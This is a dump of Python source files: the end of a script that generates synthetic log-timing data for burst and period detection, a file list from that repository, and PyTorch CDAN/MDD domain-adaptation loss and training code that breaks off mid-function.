# start_time2 = random.randint(0,60*60*24 - 60*10)
# start_time3 = random.randint(0,60*60*24 - 60*10)
# msg = 'Random Burst: 100 / 1h with 3 burst point 5min({0}-{1},{2}-{3},{4}-{5})'.format(sec2time(start_time1),sec2time(start_time1+60*10),sec2time(start_time2),sec2time(start_time2+60*10),sec2time(start_time3),sec2time(start_time3+60*10))
# time_sec = []
# for i in range(24):
# for j in range(100):
# time_sec.append(random.randint(i*60*60,(i+1)*60*60-1))
# for i in range(1000):
# time_sec.append(random.randint(start_time1,start_time1+60*10))
# for i in range(1000):
# time_sec.append(random.randint(start_time2,start_time2+60*10))
# for i in range(1000):
# time_sec.append(random.randint(start_time3,start_time3+60*10))
# time_sec = sorted(time_sec)
# insert_db(ind,msg,time_sec)
# ind += 1
'''
msg = 'Period: 60min period with a lack point'
time_sec = [x * 60 * 60 for x in range( int( 60*60*24 / (60*60) ) ) ]
del(time_sec[random.randint(0,len(time_sec)-1)])
insert_db(ind,msg,time_sec)
ind += 1
start_time1 = random.randint(0,60*60*24 - 60*10)
start_time2 = random.randint(0,60*60*24 - 60*10)
start_time3 = random.randint(0,60*60*24 - 60*10)
msg = 'Burst: 10min burst with 3 different size burst points 5min({0}-{1},{2}-{3},{4}-{5})'.format(sec2time(start_time1),sec2time(start_time1+60*10),sec2time(start_time2),sec2time(start_time2+60*10),sec2time(start_time3),sec2time(start_time3+60*10))
time_sec = []
for i in range(2000):
time_sec.append(random.randint(start_time1,start_time1+60*10))
for i in range(2000):
time_sec.append(random.randint(start_time2,start_time2+60*10))
for i in range(2000):
time_sec.append(random.randint(start_time3,start_time3+60*10))
time_sec = sorted(time_sec)
insert_db(ind,msg,time_sec)
ind += 1
'''
'''
1 2 3 5
100 500 1000 2000 3000
1min 3min 5min 10min
'''
#
# # randomize the count (3), size (3000) and duration (5 min)
# # counts = [1,2,3,5]
# # sizes = [100,500,1000,2000,3000]
# # lengths = [1,3,5,10]
# counts = [1,2,3]
# denses = [0.1,1.0,10,100]
# lengths = [10,60,120,180]
#
#
# for count in counts:
# for dens in denses:
# for length in lengths:
# cur = 0
# while(True):
# # start_time = [random.randint(0,60*60*24 - 60*length) for _ in range(10)]
# start_time = [72000,43200,14400]
# time_sec = []
# for i in range(count):
# for _ in range(int(dens*length)):
# time_sec.append(random.randint(start_time[i],start_time[i]+60*length))
#
# for i in range(24):
# for _ in range(4):
# time_sec.append(random.randint(i*60*60,(i+1)*60*60-1))
#
# time_sec = sorted(time_sec)
# msg = 'Burst: cnt {0} '.format(count)
# for i in range(count):
# msg += 'length {0} dens {1} ({2}-{3}) '.format(length,dens,sec2time(start_time[i]),sec2time(start_time[i]+60*length))
# insert_db(ind,msg,time_sec)
# ind += 1
# cur += 1
# print(ind)
# if cur == 10:
# break
# every combination of count (1,2,3,5), density (100,500,1000,2000,3000) and duration (1,3,5,10), 10 runs each, with random noise
# counts = [1,2,3]
# denses = [0.1,1.0,10,100]
# lengths = [10,60,120,180]
# random_rates = [100]
# random_rates = [1,3,10]
    # active sweep: currently a single configuration (count=1, density=100,
    # duration=180 min, no background noise); the commented lists above show
    # the fuller parameter sweeps this was reduced from
    counts = [1]
    denses = [100]
    lengths = [180]
    random_rates = [0]
    for random_rate in random_rates:
        for count in counts:
            for dens in denses:
                for length in lengths:
                    cur = 0
                    while(True):
                        # fixed burst start times: 20:00, 12:00, 04:00
                        start_time = [72000,43200,14400]
                        time_sec = []
                        for i in range(count):
                            for _ in range(int(dens*length)):
                                time_sec.append(random.randint(start_time[i],start_time[i]+60*length))
                        # uniform background noise, random_rate events per hour
                        for i in range(24):
                            for j in range(random_rate):
                                time_sec.append(random.randint(i*60*60,(i+1)*60*60-1))
                        # time_sec.append(1258)
                        #
                        # for i in range(1,15):
                        #     time_sec.append(1258+5053*i)
                        time_sec = sorted(time_sec)
                        msg = 'Burst: {0} random {1} '.format(count,random_rate)
                        for i in range(count):
                            msg += 'length {0} dens {1} ({2}-{3})'.format(length,dens,sec2time(start_time[i]),sec2time(start_time[i]+60*length))
                        insert_db(ind,msg,time_sec)
                        ind += 1
                        cur += 1
                        print(count)
                        # if cur == 10:
                        if cur == 1:
                            break
# # every combination of count (1,2,3,5), density (100,500,1000,2000,3000) and duration (1,3,5,10), 10 runs each, with a periodic baseline
# counts = [1,2,3]
# denses = [0.1,1.0,10,100]
# lengths = [10,60,120,180]
# periods = [3,5,10,30,60,120]
# for count in counts:
# for dens in denses:
# for length in lengths:
# for period in periods:
# cur = 0
# while(True):
# # if count >= 2 and lengths == 480:
# # break
#
# start_time = [72000,43200,14400]
#
# if period != 0:
# time_sec = [x * 60 * period for x in range( int( 60*60*24 / (60*period) ) ) ]
# else:
# time_sec = []
#
# for i in range(count):
# for _ in range(int(dens*length)):
# time_sec.append(random.randint(start_time[i],start_time[i]+60*length))
#
# time_sec = sorted(time_sec)
#
# msg = 'Burst: {0} period {1} '.format(count,period)
# for i in range(count):
# msg += '{0} min, dens {1} ({2}-{3}) '.format(length,dens,sec2time(start_time[i]),sec2time(start_time[i]+60*length))
# insert_db(ind,msg,time_sec)
# ind += 1
# cur += 1
# print(ind)
# if cur == 10:
# break
# # period (3-70 min), irregular points (at most 20% of all, +-3 sec)
# periods = [3,5,7,10,15,30,60,90]
# # irregular_rates = [0.0,0.1,0.2,0.3,0.4,0.5]
# noizes = [0.0,0.1,0.3,0.5,0.8]
# for period in periods:
# for noize in noizes:
# count = 0
# while(count < 100):
# # irregular_cnt = int(60*24/period*irregular_rate)
# time_sec = [x * 60 * period for x in range( int( 60*60*24 / (60*period) ) ) ]
# # for i in range(irregular_cnt):
# # d = random.randint(0,1)
# # if d == 0:
# # d = -1
# # irregular_time = random.randint(0,len(time_sec)-1)
# # time_sec[irregular_time] += d*random.randint(1,3)
#
# all_cnt = 24*60/period
# noize_cnt = all_cnt / (1 - noize) * noize
#
# for _ in range(int(noize_cnt)):
# time_sec.append(random.randint(0,24*60*60-1))
# sorted(time_sec)
# msg = 'Period: {0} min ({1} sec) period with {2} % noize'.format(period,period*60,noize*100)
# insert_db(ind,msg,time_sec)
# ind += 1
# count += 1
#
# while(ind<(7*3)):
# # period (3-70 min), irregular points (at most 20% of all, +-5 sec), plus noise of 3 events per hour
# for period in [3,5,7,10,15,30,60]:
# irregular_cnt = random.randint(1,int(60*24/period/5))
# time_sec = [x * 60 * period for x in range(1, int( 60*60*24 / (60*period) ) ) ]
#
# for i in range(24):
# for j in range(3):
# time_sec.append(random.randint(i*60*60,(i+1)*60*60-1))
#
# for i in range(irregular_cnt):
# d = [-1,1][random.randint(0,1)]
# time_sec[random.randint(0,len(time_sec)-1)] += d*random.randint(1,5)
#
# msg = 'Period: {0} min ({4} sec) period with {1} irregular point ( {1} / {2} = {3} % ) with 1/h noizes'.format(period,irregular_cnt,60*24/period,round(irregular_cnt/(60*24/period)*100,1),period*60)
# # msg = 'Period: {0} min ({1} sec) with 5 / 1h random noizes'.format(period,period*60)
# insert_db(ind,msg,time_sec)
# ind += 1
# #random log 3min or 5min
# while(ind<50):
# interval = [3,5,5,5,5,5,2]
# time_sec = [0]
# cur = 0
# while( cur < (60*60*24 - 60*5) ):
# cur += interval[random.randint(0,6)]*60
# time_sec.append(cur)
# msg = 'Random: 3min or 5min interval'
# insert_db(ind,msg,time_sec)
# ind += 1
# #random log
# random_rates = [1,3,10,100,1000]
# for random_rate in random_rates:
# while(True):
# time_sec = []
# for i in range(24):
# for _ in range(random_rate):
# time_sec.append(random.randint(i*60*60,(i+1)*60*60-1))
# msg = 'Random: random log {0} cnt/min'.format(random_rate)
# insert_db(ind,msg,time_sec)
# ind += 1
# if (ind-1)%10 == 0:
# break
# msg = 'Period: 3min 3min 5min repeat'
# period = [3,6,11]
# time_sec = [ x * 60 * 11 + period[y%3]*60 for x in range( int(60*24 / 11) * 3 ) for y in range(3) if x * 60 * 11 < 86400 - 11 * 60]
# insert_db(ind,msg,time_sec)
# ind += 1
# # period (30 min), irregular points (at most 20% of all, +-3 sec), with short 3-minute-interval runs slipped in between
# while(ind < 10):
# period = random.randint(30,30)
# irregular_cnt = random.randint(1,int(60*24/period/5))
# time_sec = [x * 60 * period for x in range( int( 60*60*24 / (60*period) ) ) ]
#
# for i in range(irregular_cnt):
# d = random.randint(0,1)
# if d == 0:
# d = -1
# irregular_time = random.randint(0,len(time_sec)-1)
# time_sec[irregular_time] += d*random.randint(1,3)
#
# for _ in range(8):
# i = random.randint(0,23)
# j = random.randint(30,60*60-900)
# time_sec.append(i*60*60 + j)
# time_sec.append(i*60*60 + j + 180 * 1)
# time_sec.append(i*60*60 + j + 180 * 2)
# time_sec.append(i*60*60 + j + 180 * 3)
# time_sec.append(i*60*60 + j + 180 * 4)
# time_sec.append(i*60*60 + j + 180 * 5)
#
#
# msg = 'Period: {0} min ({4} sec) period with {1} irregular point ( {1} / {2} = {3} %)'.format(period,irregular_cnt,60*24/period,round(irregular_cnt/(60*24/period)*100,1),period*60)
# time_sec = sorted(time_sec)
# insert_db(ind,msg,time_sec)
# ind += 1
    exit()
    # ---- unreachable: spare .dat file generation, disabled via exit() above ----
    # NOTE(review): `ft` and `group_log_list` are never defined on this path,
    # so re-enabling this tail as-is would raise NameError.
    outputname = sys.argv[1].split('.')[0]+'.dat'
    fd = open(outputname,"w")
    for k in range(1,ft[-1][0]+1):
        fd.write('group {0}\n'.format(k))
        for log in group_log_list[k]:
            fd.write(log)
        fd.write('\n')
    fd.close()
|
[
"/__init__.py",
"/burst_burst_search.py",
"/burst_detect.py",
"/burst_detect_all.py",
"/burst_notburst_search.py",
"/burst_pandas.py",
"/co_edge_plot.py",
"/create_edge_db.py",
"/create_lt_db.py",
"/dtw.py",
"/edge_coburst.py",
"/event_agg.py",
"/fft.py",
"/fullevent2event.py",
"/get_log_info.py",
"/get_logtype.py",
"/heat_map.py",
"/host_pandas.py",
"/host_plot_day.py",
"/ipython_imports.py",
"/linear.py",
"/plot.py",
"/plot_day.py",
"/query.py",
"/search_burst.py",
"/search_host_burst.py",
"/search_synmetory.py",
"/show_start_end_date.py",
"/test_db_create.py"
] |
02Bigboy/ATM
|
import numpy as np
import torch
import torch.nn as nn
def Entropy(input_):
    """Row-wise Shannon entropy of a batch of probability vectors.

    input_: (batch, classes) tensor of probabilities. Returns a (batch,)
    tensor; a small epsilon keeps log() finite at zero probabilities.
    """
    eps = 1e-5
    return torch.sum(-input_ * torch.log(input_ + eps), dim=1)
def grl_hook(coeff):
    """Gradient-reversal hook factory.

    The returned hook clones the incoming gradient and scales it by -coeff,
    implementing the GRL trick for adversarial training.
    """
    def _reverse(grad):
        return grad.clone() * -coeff
    return _reverse
def CDAN(input_list, ad_net, entropy=None, coeff=None, random_layer=None):
    """Conditional adversarial domain-adaptation loss (CDAN).

    input_list   -- [features, softmax_output]; the first half of the batch
                    is source, the second half target.
    ad_net       -- domain discriminator mapping conditioned features to a
                    sigmoid probability of "source".
    entropy      -- optional per-sample entropy; when given, samples are
                    re-weighted (entropy conditioning, CDAN+E) and the GRL
                    hook with `coeff` is attached to it.
    random_layer -- optional random multilinear map replacing the explicit
                    outer product for large feature/class dimensions.

    Bug fix: the weighted branch previously computed the per-sample
    (reduction='none') BCE into a local, then discarded it and multiplied
    the weights by the scalar *mean* BCELoss — which nullified the
    per-sample entropy weighting. The per-sample loss is now actually used.
    """
    softmax_output = input_list[1].detach()
    feature = input_list[0]
    if random_layer is None:
        # condition the discriminator on the outer product of predictions
        # and features: (batch, classes, 1) x (batch, 1, dim)
        op_out = torch.bmm(softmax_output.unsqueeze(2), feature.unsqueeze(1))
        ad_out = ad_net(op_out.view(-1, softmax_output.size(1) * feature.size(1)))
    else:
        random_out = random_layer.forward([feature, softmax_output])
        ad_out = ad_net(random_out.view(-1, random_out.size(1)))
    batch_size = softmax_output.size(0) // 2
    # domain labels: first half source (1), second half target (0)
    dc_target = torch.from_numpy(np.array([[1]] * batch_size + [[0]] * batch_size)).float().cuda()
    if entropy is not None:
        entropy.register_hook(grl_hook(coeff))
        # low-entropy (confident) samples get higher weight
        entropy = 1.0 + torch.exp(-entropy)
        source_mask = torch.ones_like(entropy)
        source_mask[feature.size(0) // 2:] = 0
        source_weight = entropy * source_mask
        target_mask = torch.ones_like(entropy)
        target_mask[0:feature.size(0) // 2] = 0
        target_weight = entropy * target_mask
        # normalize each domain's weights so both domains contribute equally
        weight = source_weight / torch.sum(source_weight).detach().item() + \
                 target_weight / torch.sum(target_weight).detach().item()
        per_sample_loss = nn.BCELoss(reduction='none')(ad_out, dc_target)
        return torch.sum(weight.view(-1, 1) * per_sample_loss) / torch.sum(weight).detach().item()
    else:
        return nn.BCELoss()(ad_out, dc_target)
def mdd_loss(features, labels, left_weight=1, right_weight=1):
    """Discrepancy between the two halves of a batch plus same-label pulling.

    The batch is split in half; the loss is the mean row-wise L2 distance
    between the two halves' softmax outputs, plus (weighted) within-half
    average same-label pair distances from get_pari_loss1.
    Raises Exception for odd batch sizes.
    """
    probs = nn.Softmax(dim=1)(features)
    batch_size = features.size(0)
    if float(batch_size) % 2 != 0:
        raise Exception('Incorrect batch size provided')
    half = int(0.5 * batch_size)
    left, right = probs[:half], probs[half:]
    discrepancy = torch.norm((left - right).abs(), 2, 1).sum() / float(batch_size)
    left_term = get_pari_loss1(labels[:half], left)
    right_term = get_pari_loss1(labels[half:], right)
    return discrepancy + left_weight * left_term + right_weight * right_term
def mdd_digit(features, labels, left_weight=1, right_weight=1, weight=1):
    """Quarter-wise variant of mdd_loss used for the digit experiments.

    Splits the batch into halves, then each half into quarters, and pairs
    the quarters position-wise via get_pair_loss. Raises Exception for odd
    batch sizes.
    """
    probs = nn.Softmax(dim=1)(features)
    batch_size = features.size(0)
    if float(batch_size) % 2 != 0:
        raise Exception('Incorrect batch size provided')
    half = int(0.5 * batch_size)
    quarter = int(0.25 * batch_size)
    left, right = probs[:half], probs[half:]
    # mean row-wise L2 distance between the two batch halves
    discrepancy = torch.norm((left - right).abs(), 2, 1).sum() / float(batch_size)
    labels_left, labels_right = labels[:half], labels[half:]
    left_term = get_pair_loss(labels_left[:quarter], labels_left[quarter:],
                              left[:quarter], left[quarter:])
    right_term = get_pair_loss(labels_right[:quarter], labels_right[quarter:],
                               right[:quarter], right[quarter:])
    return weight * discrepancy + left_weight * left_term + right_weight * right_term
def get_pair_loss(labels_left, labels_right, features_left, features_right):
    """Sum of L2 distances between feature rows whose labels agree position-wise."""
    total = 0
    for i in range(len(labels_left)):
        if labels_left[i] != labels_right[i]:
            continue
        total = total + torch.norm((features_left[i] - features_right[i]).abs(), 2, 0).sum()
    return total
def get_pari_loss1(labels, features):
    """Average L2 distance over all pairs of feature rows sharing a label.

    labels   -- indexable sequence of class labels.
    features -- tensor whose rows correspond to labels.

    Returns 0 when no same-label pair exists (previously this divided by a
    zero count and raised ZeroDivisionError, e.g. for a batch with all
    distinct labels).
    """
    loss = 0
    count = 0
    for i in range(len(labels)):
        for j in range(i + 1, len(labels)):
            if (labels[i] == labels[j]):
                count += 1
                loss += torch.norm((features[i] - features[j]).abs(), 2, 0).sum()
    if count == 0:
        # no matching pair: the average is undefined; contribute nothing
        return loss
    return loss / count
def EntropicConfusion(features):
    """Entropic-confusion term: batch mean of sum(p * log p) (negative entropy).

    Minimizing this pushes softmax outputs toward uniform predictions.
    """
    probs = nn.Softmax(dim=1)(features)
    n = features.size(0)
    return torch.mul(probs, torch.log(probs)).sum() * (1.0 / n)
--- FILE SEPARATOR ---
import argparse
import os
import os.path as osp
import torch
import torch.nn as nn
import torch.optim as optim
import network
import loss
import pre_process as prep
from torch.utils.data import DataLoader
import lr_schedule
from data_list import ImageList
import datetime
def image_classification_test(loader, model, test_10crop=True):
    """Evaluate `model` on the test split and return top-1 accuracy.

    loader       -- dict; loader['test'] is a DataLoader, or a list of 10
                    DataLoaders (one per crop) when test_10crop is True.
    model        -- callable returning (features, logits).
    test_10crop  -- average softmax scores over the 10 crops before argmax.

    Bug fix: the Python 2 `iterator.next()` calls were replaced with the
    builtin next(); iterators have no .next() method under Python 3, so the
    old code raised AttributeError. Also drops a no-op `labels = labels`.
    """
    start_test = True
    with torch.no_grad():
        if test_10crop:
            iter_test = [iter(loader['test'][i]) for i in range(10)]
            for i in range(len(loader['test'][0])):
                # one batch from each crop loader; labels are identical
                # across crops, so take them from the first
                data = [next(iter_test[j]) for j in range(10)]
                inputs = [data[j][0] for j in range(10)]
                labels = data[0][1]
                for j in range(10):
                    inputs[j] = inputs[j].cuda()
                outputs = []
                for j in range(10):
                    _, predict_out = model(inputs[j])
                    outputs.append(nn.Softmax(dim=1)(predict_out))
                # sum of per-crop softmax scores (equivalent to averaging
                # for the purpose of the argmax below)
                outputs = sum(outputs)
                if start_test:
                    all_output = outputs.float().cpu()
                    all_label = labels.float()
                    start_test = False
                else:
                    all_output = torch.cat((all_output, outputs.float().cpu()), 0)
                    all_label = torch.cat((all_label, labels.float()), 0)
        else:
            iter_test = iter(loader["test"])
            for i in range(len(loader['test'])):
                data = next(iter_test)
                inputs = data[0]
                labels = data[1]
                inputs = inputs.cuda()
                labels = labels.cuda()
                _, outputs = model(inputs)
                if start_test:
                    all_output = outputs.float().cpu()
                    all_label = labels.float()
                    start_test = False
                else:
                    all_output = torch.cat((all_output, outputs.float().cpu()), 0)
                    all_label = torch.cat((all_label, labels.float()), 0)
    _, predict = torch.max(all_output, 1)
    accuracy = torch.sum(torch.squeeze(predict).float() == all_label).item() / float(all_label.size()[0])
    return accuracy
def train(config):
    """Train a CDAN + MDD model as described by `config`; return best accuracy.

    Side effects: writes log lines to config["out_file"] and saves the best
    model under config['model_output_path'].

    Bug fixes: Python 2 `iterator.next()` replaced with next() (raises
    AttributeError under Python 3), and the 10-crop test dataset list is
    built once instead of being rebuilt identically 10 times inside a
    redundant outer loop.
    """
    ## set pre-process
    prep_dict = {}
    prep_config = config["prep"]
    prep_dict["source"] = prep.image_train(**config["prep"]['params'])
    prep_dict["target"] = prep.image_train(**config["prep"]['params'])
    if prep_config["test_10crop"]:
        prep_dict["test"] = prep.image_test_10crop(**config["prep"]['params'])
    else:
        prep_dict["test"] = prep.image_test(**config["prep"]['params'])
    ## prepare data
    dsets = {}
    dset_loaders = {}
    data_config = config["data"]
    train_bs = data_config["source"]["batch_size"]
    test_bs = data_config["test"]["batch_size"]
    dsets["source"] = ImageList(open(data_config["source"]["list_path"]).readlines(), \
                                transform=prep_dict["source"])
    dset_loaders["source"] = DataLoader(dsets["source"], batch_size=train_bs, \
                                        shuffle=True, num_workers=0, drop_last=True)
    dsets["target"] = ImageList(open(data_config["target"]["list_path"]).readlines(), \
                                transform=prep_dict["target"])
    dset_loaders["target"] = DataLoader(dsets["target"], batch_size=train_bs, \
                                        shuffle=True, num_workers=0, drop_last=True)
    if prep_config["test_10crop"]:
        # one dataset/loader per crop transform
        dsets["test"] = [ImageList(open(data_config["test"]["list_path"]).readlines(), \
                                   transform=prep_dict["test"][i]) for i in range(10)]
        dset_loaders["test"] = [DataLoader(dset, batch_size=test_bs, \
                                           shuffle=False, num_workers=0) for dset in dsets['test']]
    else:
        dsets["test"] = ImageList(open(data_config["test"]["list_path"]).readlines(), \
                                  transform=prep_dict["test"])
        dset_loaders["test"] = DataLoader(dsets["test"], batch_size=test_bs, \
                                          shuffle=False, num_workers=0)
    class_num = config["network"]["params"]["class_num"]
    ## set base network
    net_config = config["network"]
    base_network = net_config["name"](**net_config["params"])
    base_network = base_network.cuda()
    ## add additional network for some methods
    if config["loss"]["random"]:
        random_layer = network.RandomLayer([base_network.output_num(), class_num], config["loss"]["random_dim"])
        ad_net = network.AdversarialNetwork(config["loss"]["random_dim"], 1024)
    else:
        random_layer = None
        ad_net = network.AdversarialNetwork(base_network.output_num() * class_num, 1024)
    if config["loss"]["random"]:
        random_layer.cuda()
    ad_net = ad_net.cuda()
    parameter_list = base_network.get_parameters() + ad_net.get_parameters()
    ## set optimizer
    optimizer_config = config["optimizer"]
    optimizer = optimizer_config["type"](parameter_list, \
                                         **(optimizer_config["optim_params"]))
    param_lr = []
    for param_group in optimizer.param_groups:
        param_lr.append(param_group["lr"])
    schedule_param = optimizer_config["lr_param"]
    lr_scheduler = lr_schedule.schedule_dict[optimizer_config["lr_type"]]
    gpus = config['gpu'].split(',')
    if len(gpus) > 1:
        ad_net = nn.DataParallel(ad_net, device_ids=[int(i) for i in gpus])
        base_network = nn.DataParallel(base_network, device_ids=[int(i) for i in gpus])
    ## train
    len_train_source = len(dset_loaders["source"])
    len_train_target = len(dset_loaders["target"])
    best_acc = 0.0
    best_model = nn.Sequential(base_network)
    each_log = ""
    for i in range(config["num_iterations"]):
        if i % config["test_interval"] == config["test_interval"] - 1:
            # periodic evaluation; keep a copy of the best-scoring model
            base_network.train(False)
            temp_acc = image_classification_test(dset_loaders, \
                                                 base_network, test_10crop=prep_config["test_10crop"])
            temp_model = nn.Sequential(base_network)
            if temp_acc > best_acc:
                best_acc = temp_acc
                best_model = temp_model
            log_str = "iter: {:05d}, precision: {:.5f}, transfer_loss:{:.4f}, classifier_loss:{:.4f}, total_loss:{:.4f}" \
                .format(i, temp_acc, transfer_loss.item(), classifier_loss.item(), total_loss.item())
            config["out_file"].write(log_str + "\n")
            config["out_file"].flush()
            print(log_str)
            config["out_file"].write(each_log)
            config["out_file"].flush()
            each_log = ""
        loss_params = config["loss"]
        ## train one iter
        base_network.train(True)
        ad_net.train(True)
        optimizer = lr_scheduler(optimizer, i, **schedule_param)
        optimizer.zero_grad()
        # restart an epoch iterator whenever its loader is exhausted
        if i % len_train_source == 0:
            iter_source = iter(dset_loaders["source"])
        if i % len_train_target == 0:
            iter_target = iter(dset_loaders["target"])
        inputs_source, labels_source = next(iter_source)
        inputs_target, labels_target = next(iter_target)
        inputs_source, inputs_target, labels_source = inputs_source.cuda(), inputs_target.cuda(), labels_source.cuda()
        features_source, outputs_source = base_network(inputs_source)
        features_target, outputs_target = base_network(inputs_target)
        features = torch.cat((features_source, features_target), dim=0)
        outputs = torch.cat((outputs_source, outputs_target), dim=0)
        softmax_out = nn.Softmax(dim=1)(outputs)
        # pseudo-labels for the target half from the current predictions
        labels_target_fake = torch.max(nn.Softmax(dim=1)(outputs_target), 1)[1]
        labels = torch.cat((labels_source, labels_target_fake))
        entropy = loss.Entropy(softmax_out)
        transfer_loss = loss.CDAN([features, softmax_out], ad_net, entropy, network.calc_coeff(i), random_layer)
        classifier_loss = nn.CrossEntropyLoss()(outputs_source,
                                                labels_source)
        mdd_loss = loss.mdd_loss(
            features=features, labels=labels, left_weight=args.left_weight, right_weight=args.right_weight)
        max_entropy_loss = loss.EntropicConfusion(features)
        total_loss = loss_params["trade_off"] * transfer_loss \
                     + args.cls_weight * classifier_loss \
                     + args.mdd_weight * mdd_loss \
                     + args.entropic_weight * max_entropy_loss
        total_loss.backward()
        optimizer.step()
        log_str = "iter: {:05d},transfer_loss:{:.4f}, classifier_loss:{:.4f}, mdd_loss:{:4f}," \
                  "max_entropy_loss:{:.4f},total_loss:{:.4f}" \
            .format(i, transfer_loss.item(), classifier_loss.item(), mdd_loss.item(),
                    max_entropy_loss.item(), total_loss.item())
        each_log += log_str + "\n"
    torch.save(best_model, config['model_output_path'] + "{}_{}_p-{}_e-{}".
               format(config['log_name'], str(best_acc), str(config["mdd_weight"]),
                      str(config["entropic_weight"])))
    return best_acc
if __name__ == "__main__":
    # CLI configuration for CDAN + MDD image-classification training
    parser = argparse.ArgumentParser()
    parser.add_argument('--gpu_id', type=str, nargs='?', default='0', help="device id to run")
    parser.add_argument('--net', type=str, default='ResNet50',
                        choices=["ResNet18", "ResNet34", "ResNet50", "ResNet101", "ResNet152", "VGG11", "VGG13",
                                 "VGG16", "VGG19", "VGG11BN", "VGG13BN", "VGG16BN", "VGG19BN", "AlexNet"])
    parser.add_argument('--dset', type=str, default='office', choices=['office', 'image-clef', 'visda', 'office-home'],
                        help="The dataset or source dataset used")
    parser.add_argument('--s_dset_path', type=str, default='data/office/amazon_list.txt',
                        help="The source dataset path list")
    parser.add_argument('--t_dset_path', type=str, default='data/office/webcam_list.txt',
                        help="The target dataset path list")
    parser.add_argument('--test_interval', type=int, default=500, help="interval of two continuous test phase")
    parser.add_argument('--snapshot_interval', type=int, default=5000, help="interval of two continuous output model")
    parser.add_argument('--output_dir', type=str, default='san_office',
                        help="output directory of our model (in ../snapshot directory)")
    parser.add_argument('--lr', type=float, default=0.1, help="learning rate")
    parser.add_argument('--random', type=bool, default=False, help="whether use random projection")
    parser.add_argument("--mdd_weight", type=float, default=0)
    parser.add_argument("--entropic_weight", type=float, default=0)
    parser.add_argument("--log_name", type=str, default="a2w")
    parser.add_argument('--seed', type=int, default=1, metavar='S',
                        help='random seed (default: 1)')
    parser.add_argument("--use_seed", type=bool, default=False)
    parser.add_argument("--torch_seed", type=int, default=1)
    parser.add_argument("--torch_cuda_seed", type=int, default=1)
    parser.add_argument("--left_weight", type=float, default=1)
    parser.add_argument("--right_weight", type=float, default=1)
    parser.add_argument("--cls_weight", type=float, default=1)
    parser.add_argument("--epoch", type=int, default=40000)
    args = parser.parse_args()
    os.environ["CUDA_VISIBLE_DEVICES"] = args.gpu_id
    if (args.use_seed):
        # opt-in determinism: fixed seeds plus deterministic cuDNN kernels
        torch.manual_seed(args.torch_seed)
        torch.cuda.manual_seed(args.torch_cuda_seed)
        torch.cuda.manual_seed_all(args.torch_cuda_seed)
        torch.backends.cudnn.benchmark = False
        torch.backends.cudnn.deterministic = True
    config = {}
    config["left_weight"] = args.left_weight
    config["right_weight"] = args.right_weight
    config['torch_seed'] = torch.initial_seed()
    config['torch_cuda_seed'] = torch.cuda.initial_seed()
    config["mdd_weight"] = args.mdd_weight
    config["entropic_weight"] = args.entropic_weight
    config["gpu"] = args.gpu_id
    config["num_iterations"] = args.epoch
    config["test_interval"] = args.test_interval
    config["snapshot_interval"] = args.snapshot_interval
    config["output_for_test"] = True
    config["log_output_path"] = "snapshot/" + args.output_dir + "/" + args.log_name + "/log/"
    config["model_output_path"] = "snapshot/" + args.output_dir + "/" + args.log_name + "/model/"
    config['log_name'] = args.log_name
    # Create output dirs portably. Bug fix: this used
    # os.system('mkdir -p ' + path), which is shell-dependent (fails on
    # Windows / paths with spaces) and was followed by a redundant
    # osp.exists/os.mkdir fallback that could not create missing parents.
    os.makedirs(config["log_output_path"], exist_ok=True)
    os.makedirs(config["model_output_path"], exist_ok=True)
    config["out_file"] = open(
        osp.join(config["log_output_path"], args.log_name + "_{}.txt".format(str(datetime.datetime.utcnow()))), "w")
    config["prep"] = {"test_10crop": True, 'params': {"resize_size": 256, "crop_size": 224, 'alexnet': False}}
    config["loss"] = {"trade_off": 1.0}
    if "AlexNet" in args.net:
        config["prep"]['params']['alexnet'] = True
        config["prep"]['params']['crop_size'] = 227
        config["network"] = {"name": network.AlexNetFc, \
                             "params": {"use_bottleneck": True, "bottleneck_dim": 256, "new_cls": True}}
    elif "ResNet" in args.net:
        config["network"] = {"name": network.ResNetFc, \
                             "params": {"resnet_name": args.net, "use_bottleneck": True, "bottleneck_dim": 256,
                                        "new_cls": True}}
    elif "VGG" in args.net:
        config["network"] = {"name": network.VGGFc, \
                             "params": {"vgg_name": args.net, "use_bottleneck": True, "bottleneck_dim": 256,
                                        "new_cls": True}}
    config["loss"]["random"] = args.random
    config["loss"]["random_dim"] = 1024
    config["optimizer"] = {"type": optim.SGD, "optim_params": {'lr': args.lr, "momentum": 0.9, \
                                                               "weight_decay": 0.0005, "nesterov": True},
                           "lr_type": "inv", \
                           "lr_param": {"lr": args.lr, "gamma": 0.001, "power": 0.75}}
    config["dataset"] = args.dset
    config["data"] = {"source": {"list_path": args.s_dset_path, "batch_size": 36}, \
                      "target": {"list_path": args.t_dset_path, "batch_size": 36}, \
                      "test": {"list_path": args.t_dset_path, "batch_size": 4}}
    if config["dataset"] == "office":
        # per-transfer-task learning rates from the original experiments
        if ("amazon" in args.s_dset_path and "webcam" in args.t_dset_path) or \
                ("webcam" in args.s_dset_path and "dslr" in args.t_dset_path) or \
                ("webcam" in args.s_dset_path and "amazon" in args.t_dset_path) or \
                ("dslr" in args.s_dset_path and "amazon" in args.t_dset_path):
            config["optimizer"]["lr_param"]["lr"] = 0.001  # optimal parameters 0.001 default
        elif ("amazon" in args.s_dset_path and "dslr" in args.t_dset_path) or \
                ("dslr" in args.s_dset_path and "webcam" in args.t_dset_path):
            config["optimizer"]["lr_param"]["lr"] = 0.0003  # optimal parameters 0.0003 default
        config["network"]["params"]["class_num"] = 31
    elif config["dataset"] == "image-clef":
        config["optimizer"]["lr_param"]["lr"] = 0.001  # optimal parameters
        config["network"]["params"]["class_num"] = 12
    elif config["dataset"] == "visda":
        config["optimizer"]["lr_param"]["lr"] = 0.001  # optimal parameters
        config["network"]["params"]["class_num"] = 12
        config['loss']["trade_off"] = 1.0
    elif config["dataset"] == "office-home":
        config["optimizer"]["lr_param"]["lr"] = 0.001  # optimal parameters
        config["network"]["params"]["class_num"] = 65
    else:
        raise ValueError('Dataset cannot be recognized. Please define your own dataset here.')
    config["out_file"].write(str(config) + "\n")
    config["out_file"].flush()
    train(config)
--- FILE SEPARATOR ---
import argparse
import torch
import torch.nn as nn
import torch.optim as optim
from torchvision import transforms
from data_list import ImageList
import os
import loss as loss_func
import numpy as np
import network
def train(args, config, model, ad_net, random_layer, train_loader, train_loader1, optimizer, optimizer_ad, epoch):
    """Run one CDAN training epoch over the source and target loaders.

    Combines supervised cross-entropy on the labeled source batch with the
    CDAN adversarial loss (active from epoch 1 onwards) and an MDD penalty.
    Appends the accumulated epoch loss to config["out_file"].
    """
    model.train()
    len_source = len(train_loader)
    len_target = len(train_loader1)
    # Step for as many iterations as the longer loader; the shorter loader
    # is restarted whenever it runs out.
